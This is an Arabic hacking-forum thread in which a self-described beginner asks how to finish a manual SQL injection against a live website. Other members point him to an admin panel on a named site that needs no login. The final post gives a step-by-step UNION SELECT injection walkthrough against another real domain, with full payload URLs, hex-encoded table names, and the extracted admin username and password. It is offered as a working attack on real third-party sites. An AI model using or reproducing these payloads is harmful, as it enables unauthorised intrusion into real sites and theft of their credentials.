|
حل مشكله فى اختراق المواقع عن طريق السكيول السلام عليكم ورحمة الله وبركاته انا من مبتدأيين اختراق المواقع عن طريق الحقن الاعمى sql لقد اخترقت مواقع كثيره ولكن بمساعدة برامج مثل برنامج الهافج وغيره من برامج اختراق الموقع لقد قررت من فتره ان اخترق يدويا وليس بمساعدة اى برامج من برامج الاختراق احضرت موقع مصاب بثغره سكيول واستخرجت عدد الاعمده والعمود المصاب واصدار القاعده ويوزر القاعده واستخرجت ايضا عمود اليوزر والباسورد ها هما password>dmc091850_db>phplist_admin ماذا افعل بعد ذلك حتى استخرج يوزر الموقع والباسورد انا اقف فى هذه الخطوه ولا اعرف مااذا افعل وانا على هذا الحال اكثر من شهرين ارجوكم اريد ان يفيدنى احدا ما المطلوب فعله حتى استطيع استخراج يوزر وباسورد الموقع منتظر ردودكم رجاء الرد يكون موضح |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول و عليكم السلام و رحمة الله و بركاته أخـ،ــي لو تأخُذ بنصيحــ،ــــي لتُصبح مُحترفـ في الإستغلالات تعلمـ لغة الـPHP ثمـ أعد تعلم حقن الثغرة من البدايــ،ــة من هنـ،ــأ : دوره عالم المواقع SQL 1nj3ct!on و بعد ما تكملهــأ راحـ تُصبحـ على علم بكُل شيئ ،، أحسن من أن أعطيك الحُقنة و أنت لا تعلم شيئاً بهـا ،، في أمان الله |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول ارجوك اعطينى الحقنه افضل لقد مللت اعطينى حل لمشكلتى للخطوه التى اقف بها ارجوك رجاء لا احد يمر بموضوعى ويرد خذ دوره او تعلم شىء ارجوكم اريد حل لمشكله فقط |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول كما تُريد ،، ضع إلى أين أنت واصل و سأكملهـا لكـ ،، |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول انا اقف هنا يا اخى ماذا افعل بعد ذلك لاستخرج يوزر وباسورد الادمن http://tui.cn/sichuan/show.php?id=57...115,%2037%29-- |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول كود PHP: شوف اللوحة ،، تدخل لها بدون تعريف http://tui.cn/sichuan/admin/ |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول اخى اعلم والله ان اللوحه من الممكن ان ادخل لها بدون تعريف ولكن انت لم تفيدنى حتى اللان فى حل مشكلتى انا اريد ان اكمل حقنتى يدويا وقد وقفت فى هذه الخطوه التى جعلتك تراها ماذا افعل بعد ذلك حتى استخرج يوزر الموقع والباسورد رجاء اضف لى الاوامر المستخدمه من بعد هذه الخطوه وكيفيه استخدامها حتى ولو شرح مبسط وانا ساحاول الفهم ماذا افعل بعد ذلك حتى استخرج اليوزر والباسورد حتى لو مش ده الموقع اللى عاوز اخترقه انا فى كل المواقع اللى بحاول اخترقها بقف فى الخطوه دى عاوز اعرف الطريقه الصحيحيه لاستكمال الحقنه حتى استخراج يوزر الادمن وباسورده رجاء الرد وشكرا على متابعتك لموضوعى |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول تفضل يا أخي الكريم ، هذا الموضوع يشرح الخطوات التي تمر من خلالها أثناء عملية الحقن ، و يشرح لك باقي الخطوات التي توقفت أنت عندها http://www.vbspiders.com/vb/t20088.html |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول جزاك الله كل خير يا اخى شكرا لمتابعتك لحل مشكلتى جعله الله فى ميزان حسناتك ان شاء الله |
رد: حل مشكله فى اختراق المواقع عن طريق السكيول الان يظهر لنا file_users[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/tongue.gif[/IMG]ass:darkdb الان نعرف ماذا ظهر لنا file_users:اسم الجدول pass:هذا اسم عمود الباسورد لي انحنة طلعناه darkdb:غير مهمة الان طلعنة اسم الباسورد والان نظلع عمود اليوزر كيف اولا نذهب لهذا الموقع http://waraxe.us/sql-char-encoder.html ونشفر كلمة file_users [IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/5kd65kqqvzvsi2htbyu7.png[/IMG] [IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/0inwhy9lip907ip491tk.png[/IMG] عندما نذهب الى الموقع نضع الكلمة المراد تشفيرها في الخانة الولى ونضغط Encode now الان نحضر التشفير من ثاني خانة على اليسار 0x66696c655f7573657273 هذا التشفير الان نظع الامر تالي بدل الامر where+column_name+LIKE+CHAR(37, 112, 97, 115, 37) نمسحة ونضع الاتي where+table_name=xxxx مع تغير xxx الى التشقير فيصبح where+table_name=0x66696c655f7573657273 وفائتة هذا الامر هو لاظهار عمود اليوزر فيصبح الموقع http://modules.t-o-m-e.net/module.ph...5f7573657273-- [IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/58p8t6drc5hq2kcx2n.png[/IMG] file_users:name:darkdb الان ظهر الانةfile_users:name:darkdb name:هذا عمود اليوزر الان سوف نظهر اليوزر والباسورد الان نحذف هذا كلة information_schema.columns+where+table_name=0x6669 6c655f7573657273 ونضع بدلة file_users يعني يقول لة احضر من هذا الجدول ونحذف من الامر Concat(table_name,0x3a,column_name,0x3a,table_sche ma) نحف table_name,0x3a,column_name ونظع بدلة اسم عمود اليوزر وهو name يعني يصبح احضر من الجدول هذا اليوزر ونحذف table_schema ونظع بدلة اسم عمود الباسورد وهو pass يعني يقول لة احضر الباسورد من الجدول هذا فلخلاصة هي تقول الحقنة ان تحضر من الجدول file_users اليوزر هو name والباسورد هو pass فيصبح الموقع http://modules.t-o-m-e.net/module.php?id=-52+Union+Select+1,2,3,Concat(name,0x3a,pass),5,6,7 ,8,9,10,11,12,13+from+file_users-- [IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/zggettd5u8om0cbeyq04.png[/IMG] مبرووووووووووووووووك عليك darkgod:filezzz darkgod:اليوزر filezzz:الباسورد |
| الساعة الآن 07:12 AM |
[ vBspiders.Com Network ]